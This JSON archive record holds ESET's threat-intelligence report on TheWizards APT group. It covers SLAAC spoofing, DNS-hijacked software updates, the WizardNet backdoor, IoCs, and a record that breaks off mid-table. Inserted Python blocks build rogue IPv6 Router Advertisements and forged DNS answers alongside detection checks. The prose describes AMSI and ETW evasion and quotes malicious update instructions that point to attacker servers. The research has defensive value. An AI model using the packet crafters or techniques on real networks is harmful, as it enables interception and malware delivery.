{
	"id": "b34c5f34-0f38-481d-8202-d1730e7c4f1d",
	"created_at": "2026-04-06T00:17:44.677588Z",
	"updated_at": "2026-04-10T13:12:17.906158Z",
	"deleted_at": null,
	"sha1_hash": "5a7cea0a838c40b821978a2db79d18a732f0345c",
	"title": "TheWizards APT group uses SLAAC spoofing to perform adversary-in-the-middle attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1198817,
	"plain_text": "TheWizards APT group uses SLAAC spoofing to perform\r\nadversary-in-the-middle attacks\r\nBy Facundo Muñoz\r\nArchived: 2026-04-05 17:33:57 UTC\r\nIn this blogpost, ESET researchers provide an analysis of Spellbinder, a lateral movement tool for performing\r\nadversary-in-the-middle attacks, used by the China-aligned threat actor that we have named TheWizards.\r\nSpellbinder enables adversary-in-the-middle (AitM) attacks, through IPv6 stateless address autoconfiguration\r\n(SLAAC) spoofing, to move laterally in the compromised network, intercepting packets and redirecting the traffic\r\nof legitimate Chinese software so that it downloads malicious updates from a server controlled by the attackers. \r\nKey points in this blogpost:\r\nWe discovered a malicious downloader being deployed, by legitimate Chinese software update\r\nmechanisms, onto victims’ machines.\r\nThe downloader seeks to deploy a modular backdoor that we have named WizardNet.\r\nWe analyzed Spellbinder: the tool the attackers use to conduct local adversary-in-the-middle\r\nattacks and to redirect traffic to an attacker-controlled server to deliver the group’s signature\r\nbackdoor WizardNet.\r\nWe provide details abouts links between TheWizards and the Chinese company Dianke Network\r\nSecurity Technology, also known as UPSEC.\r\nOverview\r\nIn 2022, we noticed that a suspicious DLL had been downloaded by the popular Chinese input method software\r\napplication known as Sogou Pinyin. The DLL, named after a legitimate component of that software, was a dropper\r\nfor a downloader that retrieved an encrypted blob from a remote server. 
The blob contained shellcode that loads the backdoor we have named WizardNet.\r\nOur research led to the discovery of a tool, used by the attackers, that is designed to perform adversary-in-the-middle attacks using IPv6 SLAAC spoofing to intercept and reply to packets in a network, allowing the attackers to redirect traffic and serve malicious updates targeting legitimate Chinese software.\r\nVictimology\r\nTheWizards has been continuously active since at least 2022 up to the time of writing. According to ESET telemetry, TheWizards targets individuals, gambling companies, and unknown entities in the Philippines, Cambodia, the United Arab Emirates, mainland China, and Hong Kong. Its geographical distribution is shown in Figure 1.\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 1 of 16\n\nFigure 1. Geographical distribution of the victims, according to ESET telemetry\r\nWe initially discovered and analyzed Spellbinder in 2022, and observed a new version with a few changes that was deployed to compromised machines in 2023 and 2024. Once the attackers gain access to a machine in a targeted network, they deploy an archive called AVGApplicationFrameHostS.zip, and extract its components into %PROGRAMFILES%\\AVG Technologies. The files include:\r\nAVGApplicationFrameHost.exe\r\nwsc.dll\r\nlog.dat\r\nwinpcap.exe\r\nNext, the attackers install winpcap.exe and run AVGApplicationFrameHost.exe. The latter, originally named wsc_proxy.exe, is a legitimate software component from AVG that is abused to side-load wsc.dll; this DLL simply reads the shellcode from the file log.dat and executes it in memory. The shellcode decompresses and loads Spellbinder in memory.\r\nSpellbinder uses the WinPcap library to capture packets and to reply to packets when needed. The first task is to select or find an adapter with which to perform the packet capture. 
The code uses the WinPcap API pcap_findalldevs to get all available adapter devices. The devices are itemized in a numbered list for the attacker. Optionally, Spellbinder accepts, as an argument, an index that can be used to pick one adapter from this list. If a device is not supplied, Spellbinder uses the Windows APIs GetBestInterface and GetAdaptersInfo to find a suitable adapter, and prints its information on screen.\r\nFigure 2 shows the output of Spellbinder when no item number is supplied. In that case, the tool finds the most suitable adapter by itself.\r\nFigure 2. Spellbinder’s output during its initialization phase\r\nAs shown in Figure 3, once an adapter is found, Spellbinder uses the WinPcap pcap_open_live API to start capturing packets, and creates two threads: one to send ICMPv6 Router Advertisement packets (explained in the next section), and a thread to monitor network changes. The WinPcap pcap_loop API does the job of invoking a callback function from Spellbinder every time a new packet is captured.\r\nFigure 3. Spellbinder’s decompiled code that initializes the capture of packets and threads\r\nRouter Advertisement thread\r\nThis attack vector was discussed by the IETF as early as 2008 and is caused by a commonly overlooked network misconfiguration of IPv4 and IPv6 coexistence. It was then thoroughly detailed in 2011 by Alec Waters, who dubbed it the SLAAC Attack. 
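Before the walk-through of the RA fields that follows, here is that packet reconstructed from the description, as an added example that is neither ESET's code nor Spellbinder's. It builds the RA with Python's standard library only (M flag clear, Prefix Information for 2001:db8::/64, an RDNSS option carrying the two 240e:56:4000:8000:: resolvers, and a Source Link-Layer Address option), verifies the ICMPv6 checksum, parses it back the way a rogue-RA sensor would, and reports the tells a defender can check. The sender MAC and link-local address, the O flag, the lifetimes and the two allowlists are constructed assumptions; only the prefix and the RDNSS addresses come from the post.

```python
"""Added example: build the ICMPv6 Router Advertisement described in this section and inspect it
the way a rogue-RA sensor would. Standard library only; not ESET's or Spellbinder's code. The sender
MAC/link-local address, lifetimes, the O flag and the allowlists are constructed assumptions; the
prefix and RDNSS addresses are the ones the post names."""
import ipaddress
import struct

ND_ROUTER_ADVERT = 134
OPT_SRC_LLADDR, OPT_PREFIX_INFO, OPT_RDNSS = 1, 3, 25          # RFC 4861 / RFC 8106 option types
DOCUMENTATION_PREFIX = ipaddress.IPv6Network("2001:db8::/32")    # RFC 3849, never routed


def icmpv6_checksum(src, dst, body):
    """RFC 8200 upper-layer checksum over the pseudo-header (src, dst, length, next header 58)
    and the ICMPv6 body. Returns 0 when `body` already carries a correct checksum."""
    data = src.packed + dst.packed + struct.pack("!I", len(body)) + b"\x00\x00\x00\x3a" + body
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_ra(src, dst, router_mac, prefix, dns_servers, router_lifetime=1800):
    """ICMPv6 RA body (no IPv6 header) with the four parts the post lists."""
    # type 134, code 0, checksum placeholder, cur hop limit, flags, router lifetime, reachable, retrans.
    # Flags 0x00: M (0x80) clear = hosts use SLAAC; O (0x40) also clear here (the post only states M=0).
    hdr = struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0, 64, 0x00, router_lifetime, 0, 0)
    # Source Link-Layer Address option: the MAC hosts will use for their new default gateway.
    sll = struct.pack("!BB6s", OPT_SRC_LLADDR, 1, bytes.fromhex(router_mac.replace(":", "")))
    # Prefix Information option: L (on-link) and A (autonomous, i.e. SLAAC) set; lifetimes assumed.
    pio = struct.pack("!BBBBIII16s", OPT_PREFIX_INFO, 4, prefix.prefixlen, 0xC0, 86400, 14400, 0,
                      prefix.network_address.packed)
    # RDNSS option: length in 8-byte units is 1 + 2 per address; lifetime assumed.
    rdnss = struct.pack("!BBHI", OPT_RDNSS, 1 + 2 * len(dns_servers), 0, 1800) + b"".join(
        ipaddress.IPv6Address(a).packed for a in dns_servers)
    body = hdr + sll + pio + rdnss
    return body[:2] + struct.pack("!H", icmpv6_checksum(src, dst, body)) + body[4:]


def parse_ra(body):
    """Decode an RA body into its flags and options; raises ValueError on malformed input."""
    if len(body) < 16 or body[0] != ND_ROUTER_ADVERT:
        raise ValueError("not a Router Advertisement")
    flags, lifetime = body[5], struct.unpack("!H", body[6:8])[0]
    ra = {"managed": bool(flags & 0x80), "other": bool(flags & 0x40), "router_lifetime": lifetime,
          "prefixes": [], "rdnss": [], "src_mac": None}
    off = 16
    while off < len(body):
        typ, ln = body[off], body[off + 1] * 8
        if ln == 0 or off + ln > len(body):
            raise ValueError("bad ND option length")
        opt = body[off:off + ln]
        if typ == OPT_SRC_LLADDR:
            ra["src_mac"] = opt[2:8].hex(":")
        elif typ == OPT_PREFIX_INFO:
            ra["prefixes"].append(ipaddress.IPv6Network((opt[16:32], opt[2])))
        elif typ == OPT_RDNSS:
            ra["rdnss"] += [ipaddress.IPv6Address(opt[i:i + 16]) for i in range(8, ln, 16)]
        off += ln
    return ra


def assess_ra(ra, trusted_router_macs, trusted_dns):
    """Reasons to treat the RA as rogue; an empty list means nothing was flagged."""
    findings = []
    if ra["src_mac"] not in trusted_router_macs:
        findings.append("source link-layer address %s is not a known router" % ra["src_mac"])
    for p in ra["prefixes"]:
        if p.subnet_of(DOCUMENTATION_PREFIX):
            findings.append("prefix %s is the RFC 3849 documentation range" % p)
    for s in ra["rdnss"]:
        if s not in trusted_dns:
            findings.append("RDNSS server %s is not an approved resolver" % s)
    return findings


def demo():
    src = ipaddress.IPv6Address("fe80::200:5eff:fe00:5301")  # constructed link-local of the RA sender
    dst = ipaddress.IPv6Address("ff02::1")                     # all-nodes multicast, as the post states
    body = build_ra(src, dst, "00:00:5e:00:53:01", ipaddress.IPv6Network("2001:db8::/64"),
                    ["240e:56:4000:8000::11", "240e:56:4000:8000::22"])
    ra = parse_ra(body)
    checksum_ok = icmpv6_checksum(src, dst, body) == 0
    findings = assess_ra(ra, trusted_router_macs={"00:00:5e:00:53:ff"},      # constructed allowlists
                         trusted_dns={ipaddress.IPv6Address("fd00::53")})
    return body, ra, checksum_ok, findings


if __name__ == "__main__":
    _, ra, ok, findings = demo()
    print("checksum ok:", ok, "| M flag:", ra["managed"], "| prefixes:", ra["prefixes"], "| rdnss:", ra["rdnss"])
    for f in findings:
        print("ROGUE:", f)
```

The three checks in assess_ra are the ones worth wiring into a sensor that listens on ff02::1: an RA whose source MAC is not a known router, a prefix in a range that can never be legitimate on your LAN, and resolver addresses that are not yours. The first of these is also exactly what RA Guard enforces at the switch port.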
The SLAAC attack takes advantage of IPv6’s Neighbor Discovery Protocol (NDP), in which ICMPv6 Router Advertisement (RA) messages advertise that an IPv6-capable router is present in the network so that hosts that support IPv6, or are soliciting an IPv6-capable router, can adopt the advertising device as their default gateway. No authentication is involved: any host on the link segment can send an RA, and hosts accept it unless the switch drops RAs arriving on untrusted ports (RA Guard, RFC 6105) or router discovery is disabled on the host.\r\nSpellbinder sends a multicast RA packet every 200 ms to ff02::1 (“all nodes”); Windows machines in the network with IPv6 enabled will autoconfigure via stateless address autoconfiguration (SLAAC) using information provided in the RA message, and begin sending IPv6 traffic to the machine running Spellbinder, where packets will be intercepted, analyzed, and replied to where applicable. Figure 4 illustrates the first stage of the attack.\r\nFigure 4. Illustration of the SLAAC attack carried out by Spellbinder\r\nThe RA packet built by Spellbinder consists of four major parts:\r\nRA Flags: the “managed address configuration” (M) flag is set to 0, indicating to hosts that SLAAC should be used.\r\nThe prefix option that indicates to the host to use the 2001:db8::/64 prefix to generate its IPv6 address, which is not an internet-routable subnet, but rather a subnet reserved for documentation.\r\nThe recursive DNS server (RDNSS) option that provides the host with the addresses of two DNS servers: 240e:56:4000:8000::11 and 240e:56:4000:8000::22. Both addresses are part of AS4134 from China Telecom Backbone, but do not seem to be responding to DNS requests from the Internet. 
We have not found any evidence indicating that either is a legitimate DNS server. Whether they answer is irrelevant to the attack: the victim’s route to them runs through the rogue router, so every DNS query the victim sends to them crosses the machine running Spellbinder, which answers the queries it is interested in itself (see Packet processing below).\r\nThe source link-layer option, which provides the MAC address of the machine running Spellbinder as the router to use in the local network segment.\r\nFigure 5 shows one of the ICMPv6 RA messages sent by Spellbinder.\r\nFigure 5. RA message sent by Spellbinder\r\nFigure 6 shows the output of the Windows ipconfig /all command before and after running Spellbinder from a compromised machine in the network.\r\nFigure 6. Result of the Windows ipconfig command, before and after running Spellbinder\r\nPacket processing\r\nAs previously mentioned, a callback function processes the captured raw packets. Spellbinder implements its own parser to find packets to process, reply to, or print information on screen for the attacker. Table 1 describes some of the most relevant packet types processed and actions taken by the tool.\r\nTable 1. 
Protocols and packet types to which Spellbinder can reply\r\nProtocol | Message type | Action taken\r\nDNS | Query | If the queried domain matches one of the domains in a list, it answers the DNS query.\r\nICMPv6 | Router Solicitation | Sends an RA packet.\r\nICMPv6 | Router Advertisement | Logs information about the packet.\r\nICMPv6 | Neighbor Solicitation (NS) | Sends a Neighbor Advertisement (NA) packet.\r\nDHCPv6 | Solicit | Sends an Advertise message that provides DNS recursive name servers with the two previously mentioned IPv6 addresses.\r\nDHCPv6 | Information-request | Sends a Reply message that provides DNS recursive name servers with the two previously mentioned IPv6 addresses.\r\nARP | Any | Logs information about the packet.\r\nWhen a DNS query is found, Spellbinder checks whether the domain name from the query is present on a hardcoded list of subdomains. The code performing this check is shown in Figure 7.\r\nFigure 7. Decompiled code that checks whether the queried domain is present in a list of targeted domains\r\nFigure 8 is a subset of the hardcoded list in Spellbinder. The full list of targeted domains contains many entries from domains associated with several popular Chinese platforms, such as Tencent, Baidu, Xunlei, Youku, iQIYI, Kingsoft, Mango TV, Funshion, Youdao, Xiaomi and Xiaomi’s MIUI, PPLive, Meitu, Qihoo 360, Baofeng, and others.\r\nFigure 8. Subset of domains targeted by Spellbinder\r\nWhen a domain from the DNS query is found in the list, Spellbinder crafts and sends a DNS answer message indicating the domain’s IP address, which is hardcoded in the binary. 
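The DNS side of the attack, as an added example rather than code from the post or from Spellbinder: the client's query for the update host, the spoofed answer that the post describes (transaction ID and question copied, a single A record carrying the hardcoded address), and the check a resolver log or network sensor can run to flag such answers. The parser handles RFC 1035 name compression, which the answer uses for its pointer back to the question. The suffix list stands in for Spellbinder's full hardcoded list in Figure 8, the TTL and the benign address are assumptions, and 43.155.116[.]7 and 43.155.62[.]54 are the two answer addresses the post names.

```python
"""Added example: the DNS exchange behind the update hijack, with the check a sensor can run on
responses. Standard library only; not ESET's or Spellbinder's code. The suffix list stands in for the
hardcoded list in Figure 8, the TTL and the benign address are assumptions, and the two hijack
addresses are the ones the post names."""
import struct

TARGETED_SUFFIXES = ("qq.com", "hao.com")      # stand-in for Spellbinder's full hardcoded list (Figure 8)
HIJACK_IPS = {"43.155.116.7", "43.155.62.54"}   # answer addresses of the 2022 and 2024 Spellbinder versions


def encode_name(name):
    """Wire-format name: length-prefixed labels ending with a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split(".")) + b"\x00"


def decode_name(msg, off):
    """Decode a possibly compressed name at msg[off]; returns (name, offset just after it)."""
    labels, end, hops = [], None, 0
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                         # compression pointer (RFC 1035 section 4.1.4)
            if end is None:
                end = off + 2                         # the name ends where the first pointer ends
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels), (off if end is None else end)


def build_query(txid, name):
    """Standard recursive A query for `name`, as the victim's resolver would send it."""
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", 1, 1)


def build_hijack_answer(query, ip):
    """Answer a captured query the way the post describes: same ID and question, one A record for `ip`.
    Flags: QR and AA set, RD copied from the query, RA set. TTL 60 is an assumption."""
    txid, flags = struct.unpack("!HH", query[:4])
    _, off = decode_name(query, 12)
    question = query[12:off + 4]                      # QNAME + QTYPE + QCLASS
    hdr = struct.pack("!HHHHHH", txid, 0x8480 | (flags & 0x0100), 1, 1, 0, 0)
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + bytes(int(o) for o in ip.split("."))
    return hdr + question + rr


def parse_answers(msg):
    """Return (question name, [IPv4 addresses from A records in the answer section])."""
    _, _, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    off, qname, ips = 12, None, []
    for _ in range(qd):
        qname, off = decode_name(msg, off)
        off += 4
    for _ in range(an):
        _, off = decode_name(msg, off)
        rtype, rclass, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:
            ips.append(".".join(str(b) for b in msg[off:off + 4]))
        off += rdlen
    return qname, ips


def is_targeted(name):
    return any(name == s or name.endswith("." + s) for s in TARGETED_SUFFIXES)


def classify_response(msg):
    """A listed domain resolving to a known hijack address is a Spellbinder answer, whatever its transport."""
    qname, ips = parse_answers(msg)
    targeted = is_targeted(qname)
    return {"qname": qname, "ips": ips, "targeted": targeted,
            "hijacked": targeted and any(ip in HIJACK_IPS for ip in ips)}


def demo():
    query = build_query(0x1234, "update.browser.qq.com")
    spoofed = build_hijack_answer(query, "43.155.62.54")
    benign = build_hijack_answer(query, "203.0.113.10")   # TEST-NET-3 address standing in for a real answer
    return classify_response(spoofed), classify_response(benign)


if __name__ == "__main__":
    for verdict in demo():
        print(verdict)
```

classify_response only looks at content, which is enough for the addresses named here. A second signal that needs no IoC list is the transport: after the RA takes effect the victim sends these queries over IPv6 to resolvers it learned from RDNSS, so DNS responses arriving from a resolver that is not in your configuration are suspicious on their own.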
The hardcoded answer address was 43.155.116[.]7 in the version from 2022; the newest version we know of, which was used in 2024, uses 43.155.62[.]54.\r\nSpellbinder informs the attacker that the tool is answering the DNS query. Figure 9 shows the output of the tool, which includes a stylized hexadecimal dump of the entire packet, the length in bytes, and a title that reads DNS ATTACK PAYLOAD.\r\nFigure 9. Output of Spellbinder when answering a DNS query for a targeted domain\r\nFigure 10 shows the packet information.\r\nFigure 10. Wireshark display of a DNS answer message sent by Spellbinder\r\nHijacking of updates\r\nFor this blogpost we have focused on one of the latest cases in 2024, in which the update of Tencent QQ software was hijacked. The malicious server that issues the update instructions was still active at the time of writing. Figure 11 illustrates the observed chain.\r\nFigure 11. Compromise chain\r\nThe legitimate software component QQ.exe sends an HTTP request to update.browser.qq.com. 
The Spellbinder tool intercepts the DNS query for that domain name and issues a DNS answer with the IP address of an attacker-controlled server used for hijacking, for example, 43.155.62[.]54, that at the time of writing was still serving malicious updates.\r\nWhen the request is received by the hijacking server, it replies with the following (beautified by us) JSON-formatted instructions to download an archive also hosted on the same server:\r\n{\r\n \"CSoftID\": 22,\r\n \"CommandLine\": \"\",\r\n \"Desp\": \"1.1.1160.80\",\r\n \"DownloadUrl\": \"http://43.155.62[.]54:81/app/minibrowser11_rpl.zip\",\r\n \"ErrCode\": 0,\r\n \"File\": \"minibrowser11.zip\",\r\n \"Flags\": 1,\r\n \"Hash\": \"da73153c76b6f652f9b2847531d1c367\",\r\n \"InstallType\": 0,\r\n \"NewVer\": \"39.1.1170.900\",\r\n \"PatchFile\": \"QBDeltaUpdate.exe\",\r\n \"PatchHash\": \"da73153c76b6f652f9b2847531d1c367\",\r\n \"Sign\": \"\",\r\n \"Size\": 36673429,\r\n \"VerType\": \"\"\r\n}\r\nNothing in this exchange is bound to Tencent: the request and the instructions travel over plain HTTP, the Sign field is empty, and the Hash and PatchHash values come from the same server that hosts the archive, so the DNS hijack alone is enough to get a foreign archive installed.\r\nNext, QQ.exe downloads the archive minibrowser11_rpl.zip and deploys its contents to the victim’s machine; the malicious minibrowser_shell.dll is then loaded.\r\nExecution chain after a successful AitM attack\r\nThe execution of the malware on a compromised machine begins with the malicious minibrowser_shell.dll downloader. 
This DLL has three export functions and the execution of any of them triggers its main functionality, but only if the name of the current process contains QQ — for example, QQ.exe would be valid.\r\nIt uses the WinSock API to connect via TCP to an attacker-controlled server, from where it obtains an encrypted blob containing position-independent loader code and the WizardNet backdoor.\r\nLoader shellcode\r\nThe loader begins by attempting to use a well-known bypass for AMSI that patches the first bytes of the AmsiScanBuffer function to return an error code, thus bypassing the mechanism that scans memory for malicious artifacts. Then, it patches the entry point of the EtwEventWrite function with a RETN 0x14 instruction; since the CLR reports its activity through this ntdll function, the patch suppresses ETW events from the process and blinds ETW-based telemetry to the .NET payload that follows.\r\nTo execute the payload in memory, the loader initializes the .NET runtime, as shown in Figure 12, using the ICLRMetaHost, ICLRRuntimeInfo, and ICorRuntimeHost interfaces, requiring a runtime version of either v2.0.50727 or v4.0.30319.\r\nFigure 12. Decompiled code that initializes the .NET runtime to execute WizardNet in memory\r\nThen the payload is decrypted using a simple combination of ADD and XOR. The payload is loaded into memory using the .NET runtime, then its entry point is executed.\r\nWizardNet\r\nThe final payload is a backdoor that we named WizardNet – a modular implant that connects to a remote controller to receive and execute .NET modules on the compromised machine. 
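The host-side artifacts described in the next paragraphs (the mutex, the SessionKey registry path, the SessionKey format and the security-product process list) are all derived from the computer name, so a responder cannot grep for a literal; the following added example, which is not ESET's or WizardNet's code, derives them for a given host and recognises a stored SessionKey by its shape. Details the post does not state are assumptions and are marked in the code: the byte encoding of the computer name, lowercase hex, and the order and text format in which name, install time and disk serial are concatenated. WORKSTATION-01 and the other sample values are constructed.

```python
"""Added example: derive the host-specific WizardNet artifacts described in the next paragraphs so a
responder can hunt for them. Not ESET's or WizardNet's code. Assumptions the post does not state: the
computer name is hashed as UTF-8, hex is lowercase, and the SessionKey input is name + install time +
disk serial concatenated in that order as text."""
import hashlib
import re

# Process names WizardNet matches when reporting installed security products (from the post).
SECURITY_PROCESSES = frozenset({
    "360tray", "360sd", "kxetray", "ksafe", "avp", "hipstray", "qqpcrtp", "avcenter",
    "ashdisp", "avgwdsvc", "securityhealthsystray", "mcshield", "egui", "rtvscan",
})
# 16 hex-encoded MD5 bytes joined with '@' (47 characters): the shape of a stored SessionKey.
SESSION_KEY_RE = re.compile(r"^(?:[0-9a-f]{2}@){15}[0-9a-f]{2}$", re.IGNORECASE)


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()   # encoding and case are assumptions


def mutex_name(computer_name):
    """Global\\<MD5(computer_name)>: the mutex to look for on a suspect host."""
    return "Global\\" + md5_hex(computer_name)


def session_key_registry_path(computer_name):
    """HKCU\\Software\\<MD5(computer_name)>\\<MD5(computer_name)>mid: where the SessionKey is stored."""
    digest = md5_hex(computer_name)
    return "HKCU\\Software\\%s\\%smid" % (digest, digest)


def session_key(computer_name, install_time, disk_serial):
    """MD5(name + install time + disk serial), each byte hex-encoded and separated by '@'."""
    raw = hashlib.md5((computer_name + install_time + disk_serial).encode("utf-8")).digest()
    return "@".join("%02x" % b for b in raw)


def looks_like_session_key(value):
    """True for a registry value that has the SessionKey shape, whatever host produced it."""
    return bool(SESSION_KEY_RE.match(value))


def security_products_present(process_names):
    """Names from a process listing that WizardNet would report as security products (sorted, lowercase)."""
    seen = set()
    for name in process_names:
        base = name.lower().rsplit("\\", 1)[-1]
        base = base[:-4] if base.endswith(".exe") else base
        if base in SECURITY_PROCESSES:
            seen.add(base)
    return sorted(seen)


if __name__ == "__main__":
    host = "WORKSTATION-01"   # constructed sample host
    print(mutex_name(host))
    print(session_key_registry_path(host))
    print(session_key(host, "2024-03-01 10:00:00", "1A2B3C4D"))   # constructed install time and serial
    print(security_products_present(["explorer.exe", "C:\\Program Files\\360\\360tray.exe", "KSafe.exe"]))
```

Because the install time and disk serial are unknown until the host is examined, session_key is mainly useful to confirm a recovered value once those inputs are known; looks_like_session_key is the practical hunting primitive for registry sweeps, and mutex_name and session_key_registry_path give exact strings per host.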
During its initialization, WizardNet creates a mutex named Global\\\u003cMD5(computer_name)\u003e and reads shellcode from a file called ppxml.db in the current working directory or from the value of the key HKCU\\000000, and attempts to inject it into a new process of explorer.exe or %ProgramFiles%\\Windows Photo Viewer\\ImagingDevices.exe.\r\nThe last step of the initialization phase is to create a unique identifier for the computer, referred to as the SessionKey. It is the result of the MD5 hash of the computer name concatenated with the installation time of the backdoor and the serial number of the disk drive, with each hex-encoded byte of the hash value separated by @. The SessionKey is stored under the registry path HKCU\\Software\\\u003cMD5(computer_name)\u003e\\\u003cMD5(computer_name)\u003emid.\r\nDepending on its configuration, WizardNet can then create a TCP or UDP socket to communicate with its C\u0026C server, and the messages exchanged are padded using PKCS#7 padding and encrypted with AES-ECB; the SessionKey is used as the key for encryption and decryption, and a randomly generated IV for each packet is placed before the encrypted data. (ECB mode consumes no IV, so that prepended random block does not randomize the ciphertext the way a CBC IV would; identical plaintext blocks still produce identical ciphertext blocks under the same SessionKey.)\r\nThis variant of WizardNet supports five commands, as seen in Table 2. The first three allow it to execute .NET modules in memory, thus extending its functionality on the compromised system.\r\nTable 2. Overview of the commands supported by the orchestrator\r\nCommand ID | Task\r\n0x56 | Load a .NET module into the orchestrator process. The module is received in the same message and loaded from memory.\r\n0x57 | Invoke a function from a .NET module loaded with the previous command.\r\n0x58 | Unload a module previously loaded with command 0x56.\r\n0x59 | Unload a Client plugin assembly. 
Call the u method implemented in the plugin assembly, presumably to clean up before being unloaded.\r\n0x5A | Send information to the server in two messages. The first message contains system and orchestrator information:\r\n ·   machine name,\r\n ·   OS name and architecture,\r\n ·   time since system started,\r\n ·   WizardNet install date,\r\n ·   privileges of the current process,\r\n ·   security products,\r\n ·   name of the current process,\r\n ·   the previously described SessionKey, and\r\n ·   private IP address.\r\nWhen obtaining a list of security solutions, it makes a list of running processes that match the following process names: 360tray, 360sd, kxetray, ksafe, avp, hipstray, qqpcrtp, avcenter, ashdisp, avgwdsvc, securityhealthsystray, mcshield, egui, and rtvscan.\r\nLinks to Sichuan Dianke Network Security\r\nIn December 2024, Trend Micro researchers published an analysis of the MOONSHINE exploit kit and the DarkNimbus malware for Android devices. The toolset is used by a group Trend Micro tracks as Earth Minotaur and that targets primarily Tibetan and Uyghur communities. In January 2025, Intelligence Online identified the Chinese company Sichuan Dianke Network Security Technology Co., Ltd., also known as UPSEC (Figure 13), as the supplier of the DarkNimbus malware.\r\nFigure 13. UPSEC’s website\r\nESET tracks the malware that Trend Micro named DarkNimbus as DarkNights (both for Windows and Android); amusingly, Trend Micro named the malware after the string DKNS present in the malware’s function names, and we did the same (DarkNights) when we discovered the malware. 
In April 2025, NCSC UK published an advisory about the BADBAZAAR malware and MOONSHINE, also mentioning UPSEC in relation to Trend Micro’s research on Earth Minotaur.\r\nWhile TheWizards uses a different backdoor for Windows (WizardNet), the hijacking server is configured to serve DarkNights to updating applications running on Android devices. While we have not seen any victims in ESET telemetry, we managed to obtain a malicious update instruction for the Android version of Tencent QQ:\r\n{\r\n \"packages\": [{\r\n \"versionCode\": 90999,\r\n \"rules\": [],\r\n \"versionRegion\": \"\",\r\n \"plugins\": [{\r\n \"name\": \"AudioFirstPiece\",\r\n \"packageId\": \"audiofirstpiece\",\r\n \"sampleRate\": 10000,\r\n \"sampleRateHigh\": 12,\r\n \"url\": \"http://43.155.62[.]54:81/app/plugin-audiofirstpiece.ml\",\r\n \"md5\": \"a961766c1b2e5133d589be1cf47e3338\"\r\n }]\r\n }]\r\n}\r\nThe file plugin-audiofirstpiece.ml is a ZIP archive that only contains a classes.dex file, which is DarkNights for Android. This indicates that Dianke Network Security is a digital quartermaster to TheWizards APT group.\r\nESET continues tracking TheWizards independently of Earth Minotaur. While both threat actors use DarkNights/DarkNimbus, according to ESET telemetry TheWizards has focused on different targets and uses infrastructure and additional tools (for example, Spellbinder and WizardNet) not observed to be used by Earth Minotaur.\r\nConclusion\r\nIn 2022, we discovered the activity of a China-aligned APT group that we have named TheWizards. 
We analyzed the custom malware and tools developed and used by TheWizards: the IPv6 AitM tool we’ve named Spellbinder, which allows the attackers to redirect the update protocols of legitimate Chinese software to malicious servers, where the software is tricked into downloading and executing fake updates on victims’ machines, and the malicious components that launch the backdoor that we have named WizardNet.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 | Filename | ESET detection name | Description\r\n9784A1483B4586EB12D86E549D39CA4BB63871B8 | minibrowser_shell.dll | Win32/Agent.AGNF | Downloader component.\r\n4DB38A097AE4D5E70B2F51A8EE13B0C1EE01A2A1 | Client.exe | MSIL/Agent.DMS | WizardNet backdoor.\r\n76953E949AC54BE8FF3A68794EF1419E9EF9AFCB | ipv6.exe | Win64/Agent.CAZ | Spellbinder tool (2022).\r\nDA867188937698C7769861C72F5490CB9C3D4F63 | N/A | Win64/Agent.CAZ | Spellbinder tool (2023), loaded in memory.\r\n0CBA19B19DF9E2C5EBE55D9DE377D26A1A51B70A | wsc.dll | Win64/Agent.EUO | Loads shellcode from log.dat.\r\n1A8147050AF6F05DEA5FBCA1AE1FF2FFD2B68F9C | log.dat | Win32/Rozena.BXT | Shellcode that loads Spellbinder.\r\n2D376ADF44DBD9CF5DB08884E76192D0BC9984C4 | plugin-audiofirstpiece.ml | Android/Spy.Agent.EEF | ZIP archive containing DarkNights for Android.\r\n5B70A853D8E989AD102D639FBF7636B697313ABC | classes.dex | Android/Spy.Agent.EEF | DarkNights 
for Android.\r\nNetwork\r\nIP | Domain | Provider | First seen | Details\r\n43.155.116[.]7 | hao[.]com | ACEVILLEPTELTD-SG | 2022-11-06 | Server issuing malicious updates to legitimate applications in 2022. Used by Spellbinder. (Note: Spellbinder hijacks requests to resolve the hao[.]com domain.)\r\n43.155.62[.]54 | vv.ssl-dns[.]com | ACEVILLEPTELTD-SG | 2022-11-29 | Server issuing malicious updates to legitimate applications in 2023 and 2024. Used by Spellbinder.\r\n43.135.35[.]84 | mkdmcdn[.]com | ACE-SG | 2023-11-15 | WizardNet C\u0026C server.\r\n103.243.181[.]120 | assetsqq[.]com | HK Kwaifong Group Limited | 2021-07-15 | DarkNights C\u0026C server.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 16 of the MITRE ATT\u0026CK framework.\r\nTactic | ID | Name | Description\r\nResource Development | T1583.001 | Acquire Infrastructure: Domains | TheWizards has registered the domains hao[.]com, ssl-dns[.]com, and mkdmcdn[.]com.\r\nResource Development | T1583.004 | Acquire Infrastructure: Server | TheWizards acquired servers for hosting tools, C\u0026C, and to serve malicious updates.\r\nResource Development | T1587.001 | Develop Capabilities: Malware | TheWizards uses custom malware such as the WizardNet backdoor and Spellbinder.\r\nResource Development | 